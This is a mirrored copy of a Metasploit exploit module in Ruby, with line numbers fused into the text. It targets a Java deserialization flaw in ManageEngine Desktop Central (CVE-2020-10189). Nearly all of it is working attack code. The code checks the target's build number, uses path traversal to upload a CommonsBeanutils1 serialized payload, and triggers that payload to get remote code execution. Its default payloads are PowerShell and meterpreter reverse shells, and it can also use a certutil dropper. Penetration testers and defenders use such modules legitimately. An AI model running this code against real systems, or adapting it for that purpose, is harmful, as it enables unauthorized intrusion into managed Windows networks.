CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!
Path: blob/master/modules/exploits/windows/http/desktopcentral_deserialization.rb
Views: 1904
##1# This module requires Metasploit: https://metasploit.com/download2# Current source: https://github.com/rapid7/metasploit-framework3##45class MetasploitModule < Msf::Exploit::Remote67Rank = GreatRanking89prepend Msf::Exploit::Remote::AutoCheck10include Msf::Exploit::Remote::HttpClient11include Msf::Exploit::CmdStager12include Msf::Exploit::FileDropper13include Msf::Exploit::JavaDeserialization1415def initialize(info = {})16super(17update_info(18info,19'Name' => 'ManageEngine Desktop Central Java Deserialization',20'Description' => %q{21This module exploits a Java deserialization vulnerability in the22getChartImage() method from the FileStorage class within ManageEngine23Desktop Central versions < 10.0.474. Tested against 10.0.465 x64.2425Quoting the vendor's advisory on fixed versions:2627"The short-term fix for the arbitrary file upload vulnerability was28released in build 10.0.474 on January 20, 2020. In continuation of29that, the complete fix for the remote code execution vulnerability is30now available in build 10.0.479."31},32'Author' => [33'mr_me', # Discovery and exploit34'wvu' # Module35],36'References' => [37['CVE', '2020-10189'],38['URL', 'https://srcincite.io/advisories/src-2020-0011/'],39['URL', 'https://srcincite.io/pocs/src-2020-0011.py.txt'],40['URL', 'https://twitter.com/steventseeley/status/1235635108498948096'],41['URL', 'https://www.manageengine.com/products/desktop-central/remote-code-execution-vulnerability.html']42],43'DisclosureDate' => '2020-03-05', # 0day release44'License' => MSF_LICENSE,45'Platform' => 'win',46'Arch' => [ARCH_CMD, ARCH_X86, ARCH_X64],47'Privileged' => true,48'Targets' => [49[50'Windows Command',51{52'Arch' => ARCH_CMD,53'Type' => :win_cmd,54'DefaultOptions' => {55'PAYLOAD' => 'cmd/windows/powershell_reverse_tcp'56}57}58],59[60'Windows Dropper',61{62'Arch' => [ARCH_X86, ARCH_X64],63'Type' => :win_dropper,64'CmdStagerFlavor' => :certutil, # This works without issue65'DefaultOptions' => {66'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'67}68}69],70[71'PowerShell Stager',72{73'Arch' => [ARCH_X86, ARCH_X64],74'Type' => :psh_stager,75'DefaultOptions' => {76'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'77}78}79]80],81'DefaultTarget' => 2,82'DefaultOptions' => {83'SSL' => true,84'WfsDelay' => 60 # It can take a little while to trigger85},86'Notes' => {87'Stability' => [SERVICE_RESOURCE_LOSS], # May 404 the upload page?88'Reliability' => [FIRST_ATTEMPT_FAIL], # Payload upload may fail89'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]90}91)92)9394register_options([95Opt::RPORT(8383),96OptString.new('TARGETURI', [true, 'Base path', '/'])97])98end99100def check101res = send_request_cgi(102'method' => 'GET',103'uri' => normalize_uri(target_uri.path, 'configurations.do')104)105106unless res107return CheckCode::Unknown('Target did not respond to check.')108end109110unless res.code == 200 && res.body.include?('ManageEngine Desktop Central')111return CheckCode::Unknown('Target is not running Desktop Central.')112end113114build = res.get_html_document.at('//input[@id = "buildNum"]/@value')&.text115116unless build&.match(/\d+/)117return CheckCode::Detected(118'Target did not respond with Desktop Central build.'119)120end121122# Desktop Central build 100474 is equivalent to version 10.0.474123if build.to_i < 100474124return CheckCode::Appears(125"Desktop Central #{build} is a vulnerable build."126)127end128129CheckCode::Safe("Desktop Central #{build} is NOT a vulnerable build.")130end131132def exploit133print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")134135case target['Type']136when :win_cmd137execute_command(payload.encoded)138when :win_dropper139execute_cmdstager140when :psh_stager141execute_command(cmd_psh_payload(142payload.encoded,143payload.arch.first,144remove_comspec: true145))146end147end148149def execute_command(cmd, _opts = {})150vprint_status("Executing command: #{cmd}")151152# I identified mr_me's binary blob as the CommonsBeanutils1 payload :)153java_payload = generate_java_deserialization_for_command(154'CommonsBeanutils1',155'cmd',156cmd157)158159# XXX: Patch in expected serialVersionUID160java_payload[140, 8] = "\xcf\x8e\x01\x82\xfe\x4e\xf1\x7e"161162# Rock 'n' roll!163upload_serialized_payload(java_payload)164deserialize_payload165end166167def upload_serialized_payload(serialized_payload)168print_status('Uploading serialized payload')169170res = send_request_cgi(171'method' => 'POST',172'uri' => normalize_uri(target_uri.path, '/mdm/client/v1/mdmLogUploader'),173'ctype' => 'application/octet-stream',174'vars_get' => {175# Traversal from C:\Program Files\DesktopCentral_Server\mdm-logs\foo\bar176'udid' => '\\..\\..\\..\\webapps\\DesktopCentral\\_chart',177'filename' => 'logger.zip'178},179'data' => serialized_payload180)181182unless res && res.code == 200183fail_with(Failure::UnexpectedReply, 'Could not upload serialized payload')184end185186print_good('Successfully uploaded serialized payload')187188# Shell lands in C:\Program Files\DesktopCentral_Server\bin189register_file_for_cleanup('..\\webapps\\DesktopCentral\\_chart\\logger.zip')190end191192def deserialize_payload193print_status('Deserializing payload')194195res = send_request_cgi(196'method' => 'GET',197'uri' => normalize_uri(target_uri.path, 'cewolf'),198'vars_get' => {199'img' => '\\logger.zip'200}201)202203unless res && res.code == 200204fail_with(Failure::UnexpectedReply, 'Could not deserialize payload')205end206207print_good('Successfully deserialized payload')208end209210end211212213